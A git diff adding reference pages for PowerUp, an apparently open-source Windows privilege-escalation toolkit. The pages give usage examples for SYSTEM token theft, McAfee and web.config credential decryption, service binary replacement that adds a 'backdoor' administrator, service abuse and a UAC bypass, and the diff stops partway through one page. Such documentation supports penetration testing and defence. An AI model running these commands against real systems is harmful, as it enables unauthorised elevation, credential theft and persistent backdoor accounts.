+Parameter Sets: (All)

+Aliases: Privileged

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.TokenGroup

+

+Outputs a custom object containing the token group (SID/attributes) for the specified token if

+"-InformationClass 'Groups'" is passed.

+

+PowerUp.TokenPrivilege

+

+Outputs a custom object containing the token privilege (name/attributes) for the specified token if

+"-InformationClass 'Privileges'" is passed

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-RegistryAlwaysInstallElevated.md b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md
new file mode 100755
index 0000000..ff48afc
--- /dev/null
+++ b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md
@@ -0,0 +1,45 @@
+# Get-RegistryAlwaysInstallElevated

+

+## SYNOPSIS

+Checks if any of the AlwaysInstallElevated registry keys are set.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-RegistryAlwaysInstallElevated

+```

+

+## DESCRIPTION

+Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

+or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys

+are set, $False otherwise.

+If one of these keys are set, then all .MSI files run with

+elevated permissions, regardless of current user permissions.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-RegistryAlwaysInstallElevated

+```

+

+Returns $True if any of the AlwaysInstallElevated registry keys are set.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### System.Boolean

+

+$True if RegistryAlwaysInstallElevated is set, $False otherwise.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-RegistryAutoLogon.md b/docs/Privesc/Get-RegistryAutoLogon.md
new file mode 100755
index 0000000..b93e75c
--- /dev/null
+++ b/docs/Privesc/Get-RegistryAutoLogon.md
@@ -0,0 +1,44 @@
+# Get-RegistryAutoLogon

+

+## SYNOPSIS

+Finds any autologon credentials left in the registry.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-RegistryAutoLogon

+```

+

+## DESCRIPTION

+Checks if any autologon accounts/credentials are set in a number of registry locations.

+If they are, the credentials are extracted and returned as a custom PSObject.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-RegistryAutoLogon

+```

+

+Finds any autologon credentials left in the registry.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.RegistryAutoLogon

+

+Custom PSObject containing autologin credentials found in the registry.

+

+## NOTES

+

+## RELATED LINKS

+

+[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb)

+

diff --git a/docs/Privesc/Get-ServiceDetail.md b/docs/Privesc/Get-ServiceDetail.md
new file mode 100755
index 0000000..ac758b0
--- /dev/null
+++ b/docs/Privesc/Get-ServiceDetail.md
@@ -0,0 +1,65 @@
+# Get-ServiceDetail

+

+## SYNOPSIS

+Returns detailed information about a specified service by querying the

+WMI win32_service class for the specified service name.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-ServiceDetail [-Name] <String[]>

+```

+

+## DESCRIPTION

+Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on

+the pipeline object returned by Get-Service, extracts out the service name, queries the

+WMI win32_service class for the specified service for details like binPath, and outputs

+everything.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-ServiceDetail -Name VulnSVC

+```

+

+Gets detailed information about the 'VulnSVC' service.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service VulnSVC | Get-ServiceDetail

+```

+

+Gets detailed information about the 'VulnSVC' service.

+

+## PARAMETERS

+

+### -Name

+An array of one or more service names to query information for.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.Management.ManagementObject

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Get-SiteListPassword.md b/docs/Privesc/Get-SiteListPassword.md
new file mode 100755
index 0000000..1ebbb5b
--- /dev/null
+++ b/docs/Privesc/Get-SiteListPassword.md
@@ -0,0 +1,96 @@
+# Get-SiteListPassword

+

+## SYNOPSIS

+Retrieves the plaintext passwords for found McAfee's SiteList.xml files.

+Based on Jerome Nokin (@funoverip)'s Python solution (in links).

+

+Author: Jerome Nokin (@funoverip)  

+PowerShell Port: @harmj0y  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-SiteListPassword [[-Path] <String[]>]

+```

+

+## DESCRIPTION

+Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,

+C:\Documents and Settings\, or C:\Users\.

+For any files found, the appropriate

+credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword

+function that takes advantage of McAfee's static key encryption.

+Any decrypted credentials

+are output in custom objects.

+See links for more information.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-SiteListPassword

+```

+

+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

+UserName    :

+Path        : Products/CommonUpdater

+Name        : McAfeeHttp

+DecPassword : MyStrongPassword!

+Enabled     : 1

+DomainName  :

+Server      : update.nai.com:80

+

+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

+UserName    : McAfeeService

+Path        : Repository$

+Name        : Paris

+DecPassword : MyStrongPassword!

+Enabled     : 1

+DomainName  : companydomain

+Server      : paris001

+

+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

+UserName    : McAfeeService

+Path        : Repository$

+Name        : Tokyo

+DecPassword : MyStrongPassword!

+Enabled     : 1

+DomainName  : companydomain

+Server      : tokyo000

+

+## PARAMETERS

+

+### -Path

+Optional path to a SiteList.xml file or folder.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.SiteListPassword

+

+## NOTES

+

+## RELATED LINKS

+

+[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/

+https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/

+https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md

+https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/

+https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/

+https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md

+https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf)

+

diff --git a/docs/Privesc/Get-System.md b/docs/Privesc/Get-System.md
new file mode 100755
index 0000000..bcaf3d6
--- /dev/null
+++ b/docs/Privesc/Get-System.md
@@ -0,0 +1,172 @@
+# Get-System

+

+## SYNOPSIS

+GetSystem functionality inspired by Meterpreter's getsystem.

+'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create

+a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.

+NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure

+token duplication works correctly.

+

+PowerSploit Function: Get-System

+Author: @harmj0y, @mattifestation

+License: BSD 3-Clause

+Required Dependencies: None

+Optional Dependencies: None

+

+## SYNTAX

+

+### NamedPipe (Default)

+```

+Get-System [-Technique <String>] [-ServiceName <String>] [-PipeName <String>]

+```

+

+### Token

+```

+Get-System [-Technique <String>]

+```

+

+### RevToSelf

+```

+Get-System [-RevToSelf]

+```

+

+### WhoAmI

+```

+Get-System [-WhoAmI]

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-System

+```

+

+Uses named impersonate to elevate the current thread token to SYSTEM.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'

+```

+

+Uses named impersonate to elevate the current thread token to SYSTEM

+with a custom service and pipe name.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-System -Technique Token

+```

+

+Uses token duplication to elevate the current thread token to SYSTEM.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-System -WhoAmI

+```

+

+Displays the credentials for the current thread.

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+Get-System -RevToSelf

+```

+

+Reverts the current thread privileges.

+

+## PARAMETERS

+

+### -Technique

+The technique to use, 'NamedPipe' or 'Token'.

+

+```yaml

+Type: String

+Parameter Sets: NamedPipe, Token

+Aliases: 

+

+Required: False

+Position: Named

+Default value: NamedPipe

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServiceName

+The name of the service used with named pipe impersonation, defaults to 'TestSVC'.

+

+```yaml

+Type: String

+Parameter Sets: NamedPipe

+Aliases: 

+

+Required: False

+Position: Named

+Default value: TestSVC

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PipeName

+The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.

+

+```yaml

+Type: String

+Parameter Sets: NamedPipe

+Aliases: 

+

+Required: False

+Position: Named

+Default value: TestSVC

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RevToSelf

+Reverts the current thread privileges.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: RevToSelf

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -WhoAmI

+Switch.

+Display the credentials for the current PowerShell thread.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: WhoAmI

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c

+https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot

+http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

+http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c

+https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot

+http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

+http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/)

+

diff --git a/docs/Privesc/Get-UnattendedInstallFile.md b/docs/Privesc/Get-UnattendedInstallFile.md
new file mode 100755
index 0000000..8927520
--- /dev/null
+++ b/docs/Privesc/Get-UnattendedInstallFile.md
@@ -0,0 +1,44 @@
+# Get-UnattendedInstallFile

+

+## SYNOPSIS

+Checks several locations for remaining unattended installation files,

+which may have deployment credentials.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-UnattendedInstallFile

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-UnattendedInstallFile

+```

+

+Finds any remaining unattended installation files.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.UnattendedInstallFile

+

+Custom PSObject containing results.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)

+

diff --git a/docs/Privesc/Get-UnquotedService.md b/docs/Privesc/Get-UnquotedService.md
new file mode 100755
index 0000000..4b61355
--- /dev/null
+++ b/docs/Privesc/Get-UnquotedService.md
@@ -0,0 +1,45 @@
+# Get-UnquotedService

+

+## SYNOPSIS

+Get-UnquotedService Returns the name and binary path for services with unquoted paths

+that also have a space in the name.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission

+

+## SYNTAX

+

+```

+Get-UnquotedService

+```

+

+## DESCRIPTION

+Uses Get-WmiObject to query all win32_service objects and extract out

+the binary pathname for each.

+Then checks if any binary paths have a space

+and aren't quoted.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-UnquotedService

+```

+

+Get a set of potentially exploitable services.

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.UnquotedService

+

+## NOTES

+

+## RELATED LINKS

+

+[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb)

+

diff --git a/docs/Privesc/Get-WebConfig.md b/docs/Privesc/Get-WebConfig.md
new file mode 100755
index 0000000..78cef7d
--- /dev/null
+++ b/docs/Privesc/Get-WebConfig.md
@@ -0,0 +1,93 @@
+# Get-WebConfig

+

+## SYNOPSIS

+This script will recover cleartext and encrypted connection strings from all web.config

+files on the system.

+Also, it will decrypt them if needed.

+

+Author: Scott Sutherland, Antti Rantasaari  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-WebConfig

+```

+

+## DESCRIPTION

+This script will identify all of the web.config files on the system and recover the

+connection strings used to support authentication to backend databases. 

+If needed, the

+script will also decrypt the connection strings on the fly. 

+The output supports the

+pipeline which can be used to convert all of the results into a pretty table by piping

+to format-table.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Return a list of cleartext and decrypted connect strings from web.config files.

+```

+

+Get-WebConfig

+

+user   : s1admin

+pass   : s1password

+dbserv : 192.168.1.103\server1

+vdir   : C:\test2

+path   : C:\test2\web.config

+encr   : No

+

+user   : s1user

+pass   : s1password

+dbserv : 192.168.1.103\server1

+vdir   : C:\inetpub\wwwroot

+path   : C:\inetpub\wwwroot\web.config

+encr   : Yes

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Return a list of clear text and decrypted connect strings from web.config files.

+```

+

+Get-WebConfig | Format-Table -Autosize

+

+user    pass       dbserv                vdir               path                          encr

+----    ----       ------                ----               ----                          ----

+s1admin s1password 192.168.1.101\server1 C:\App1            C:\App1\web.config            No

+s1user  s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No

+s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\test\web.config       No

+s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\web.config            Yes

+s3user  s3password 192.168.1.103\server3 D:\App3            D:\App3\web.config            No

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+### System.Boolean

+

+System.Data.DataTable

+

+## NOTES

+Below is an alterantive method for grabbing connection strings, but it doesn't support decryption.

+for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings

+

+Author: Scott Sutherland - 2014, NetSPI

+Author: Antti Rantasaari - 2014, NetSPI

+

+## RELATED LINKS

+

+[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1

+http://www.netspi.com

+https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx

+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe

+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1

+http://www.netspi.com

+https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx

+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe

+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)

+

diff --git a/docs/Privesc/Install-ServiceBinary.md b/docs/Privesc/Install-ServiceBinary.md
new file mode 100755
index 0000000..bc75a2a
--- /dev/null
+++ b/docs/Privesc/Install-ServiceBinary.md
@@ -0,0 +1,175 @@
+# Install-ServiceBinary

+

+## SYNOPSIS

+Replaces the service binary for the specified service with one that executes

+a specified command as SYSTEM.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary

+

+## SYNTAX

+

+```

+Install-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]

+ [-Credential <PSCredential>] [-Command <String>]

+```

+

+## DESCRIPTION

+Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the

+current user can  modify the associated service binary listed in the binPath.

+Backs up

+the original service binary to "OriginalService.exe.bak" in service binary location,

+and then uses Write-ServiceBinary to create a C# service binary that either adds

+a local administrator user or executes a custom command.

+The new service binary is

+replaced in the original service binary path, and a custom object is returned that

+captures the original and new service binary configuration.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Install-ServiceBinary -Name VulnSVC

+```

+

+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary

+for VulnSVC with one that adds a local Administrator (john/Password123!).

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service VulnSVC | Install-ServiceBinary

+```

+

+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary

+for VulnSVC with one that adds a local Administrator (john/Password123!).

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'

+```

+

+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary

+for VulnSVC with one that adds TESTLAB\john to the Administrators local group.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!

+```

+

+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary

+for VulnSVC with one that adds a local Administrator (backdoor/Password123!).

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+Install-ServiceBinary -Name VulnSVC -Command "net ..."

+```

+

+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary

+for VulnSVC with one that executes a custom command.

+

+## PARAMETERS

+

+### -Name

+The service name the EXE will be running under.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -UserName

+The \[domain\\\]username to add.

+If not given, it defaults to "john".

+Domain users are not created, only added to the specified localgroup.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: John

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Password

+The password to set for the added user.

+If not given, it defaults to "Password123!"

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Password123!

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LocalGroup

+Local group name to add the user to (default of 'Administrators').

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Administrators

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object specifying the user/password to add.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Command

+Custom command to execute instead of user creation.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.ServiceBinary.Installed

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Invoke-PrivescAudit.md b/docs/Privesc/Invoke-PrivescAudit.md
new file mode 100755
index 0000000..7110962
--- /dev/null
+++ b/docs/Privesc/Invoke-PrivescAudit.md
@@ -0,0 +1,63 @@
+# Invoke-PrivescAudit

+

+## SYNOPSIS

+Executes all functions that check for various Windows privilege escalation opportunities.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Invoke-PrivescAudit [-HTMLReport]

+```

+

+## DESCRIPTION

+Executes all functions that check for various Windows privilege escalation opportunities.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-PrivescAudit

+```

+

+Runs all escalation checks and outputs a status report for discovered issues.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Invoke-PrivescAudit -HTMLReport

+```

+

+Runs all escalation checks and outputs a status report to SYSTEM.username.html

+detailing any discovered issues.

+

+## PARAMETERS

+

+### -HTMLReport

+Switch.

+Write a HTML version of the report to SYSTEM.username.html.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.String

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Invoke-ServiceAbuse.md b/docs/Privesc/Invoke-ServiceAbuse.md
new file mode 100755
index 0000000..8d493d7
--- /dev/null
+++ b/docs/Privesc/Invoke-ServiceAbuse.md
@@ -0,0 +1,194 @@
+# Invoke-ServiceAbuse

+

+## SYNOPSIS

+Abuses a function the current user has configuration rights on in order

+to add a local administrator or execute a custom command.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath

+

+## SYNTAX

+

+```

+Invoke-ServiceAbuse [-Name] <String[]> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]

+ [-Credential <PSCredential>] [-Command <String>] [-Force]

+```

+

+## DESCRIPTION

+Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current

+user has configuration modification rights on and executes a series of automated actions to

+execute commands as SYSTEM.

+First, the service is enabled if it was set as disabled and the

+original service binary path and configuration state are preserved.

+Then the service is stopped

+and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a

+series of commands, the service is started, stopped, and the next command is configured.

+After

+completion, the original service configuration is restored and a custom object is returned

+that captures the service abused and commands run.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-ServiceAbuse -Name VulnSVC

+```

+

+Abuses service 'VulnSVC' to add a localuser "john" with password

+"Password123!

+to the  machine and local administrator group

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service VulnSVC | Invoke-ServiceAbuse

+```

+

+Abuses service 'VulnSVC' to add a localuser "john" with password

+"Password123!

+to the  machine and local administrator group

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"

+```

+

+Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the

+local adminisrtators group.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"

+```

+

+Abuses service 'VulnSVC' to add a localuser "backdoor" with password

+"password" to the  machine and local "Power Users" group

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+Invoke-ServiceAbuse -Name VulnSVC -Command "net ..."

+```

+

+Abuses service 'VulnSVC' to execute a custom command.

+

+## PARAMETERS

+

+### -Name

+An array of one or more service names to abuse.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: ServiceName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -UserName

+The \[domain\\\]username to add.

+If not given, it defaults to "john".

+Domain users are not created, only added to the specified localgroup.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: John

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Password

+The password to set for the added user.

+If not given, it defaults to "Password123!"

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Password123!

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LocalGroup

+Local group name to add the user to (default of 'Administrators').

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Administrators

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object specifying the user/password to add.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Command

+Custom command to execute instead of user creation.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Force

+Switch.

+Force service stopping, even if other services are dependent.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerUp.AbusedService

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Privesc/Invoke-WScriptUACBypass.md b/docs/Privesc/Invoke-WScriptUACBypass.md
new file mode 100755
index 0000000..f9eeb8d
--- /dev/null
+++ b/docs/Privesc/Invoke-WScriptUACBypass.md
@@ -0,0 +1,85 @@
+# Invoke-WScriptUACBypass

+

+## SYNOPSIS

+Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.

+

+Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Invoke-WScriptUACBypass [-Command] <String> [-WindowStyle <String>]

+```

+

+## DESCRIPTION

+Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute

+VBScript using the wscript executable with the new manifest.

+The VBScript executed by

+C:\Windows\wscript.exe will run elevated.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+"

+```

+

+Launches the specified PowerShell encoded command in high-integrity.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible'

+```

+

+Spawns a high integrity cmd.exe.

+

+## PARAMETERS

+

+### -Command

+The shell command you want wscript.exe to run elevated.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: CMD

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -WindowStyle

+Whether to display or hide the window for the executed '-Command X'.

+Accepted values are 'Hidden' and 'Normal'/'Visible.

+Default is 'Hidden'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Hidden

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html

+https://github.com/Vozzie/uacscript

+https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html

+https://github.com/Vozzie/uacscript

+https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1)

+

diff --git a/docs/Privesc/Restore-ServiceBinary.md b/docs/Privesc/Restore-ServiceBinary.md
new file mode 100755
index 0000000..a88fc29
--- /dev/null
+++ b/docs/Privesc/Restore-ServiceBinary.md
@@ -0,0 +1,87 @@
+# Restore-ServiceBinary

+

+## SYNOPSIS

+Restores a service binary backed up by Install-ServiceBinary.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath

+

+## SYNTAX

+

+```

+Restore-ServiceBinary [-Name] <String> [[-BackupPath] <String>]

+```

+

+## DESCRIPTION

+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and

+checks for the existence of an "OriginalServiceBinary.exe.bak" in the service

+binary location.

+If it exists, the backup binary is restored to the original

+binary path.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Restore-ServiceBinary -Name VulnSVC

+```

+

+Restore the original binary for the service 'VulnSVC'.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-Service VulnSVC | Restore-ServiceBinary

+```

+

